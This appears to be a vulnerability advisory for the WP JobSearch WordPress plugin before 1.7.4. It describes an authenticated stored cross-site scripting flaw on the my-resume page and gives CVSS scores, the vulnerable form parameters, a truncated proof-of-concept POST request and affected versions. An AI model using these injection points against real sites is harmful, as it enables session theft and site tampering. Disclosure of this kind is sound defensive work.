M0zeWPVDB-ID:B378D36D-66D9-4373-A628-E379E4766375WP JobSearch < 1.7.4 - Authenticated Stored XSS
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
3.5 Low
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N
The plugin did not sanitise or escape multiple of its parameters from the my-resume page before outputting them in the page, allowing low privilege users to use JavaScript payloads in them and leading to a Stored Cross-Site Scripting issue
PoC
Vulnerable parameter(s): &jobsearch;_field_education_title[]=, &jobsearch;_field_education_academy[]=, &jobsearch;_field_experience_company[]=, &jobsearch;_field_portfolio_title[]=, &jobsearch;_field_portfolio_vurl[]=, &jobsearch;_field_portfolio_url[]=, &jobsearch;_field_skill_title[]=, &jobsearch;_field_lang_title[]=. PoC | Authenticated Persistent XSS | Candidate Profile: POST /plugins/jobsearch/user-dashboard/?tab=my-resume HTTP/2 Cookie: [user cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 1612 jobsearch_field_resume_cover_letter=PoC&candidate;_cover_file=&get;_cand_skills%5B%5D=1553&jobsearch;_field_education_title%5B%5D=
| CPE | Name | Operator | Version |
|---|---|---|---|
| wp-jobsearch | lt | 1.7.4 | |
| careerfy | lt | 6.3.0 |
Related
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
3.5 Low
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N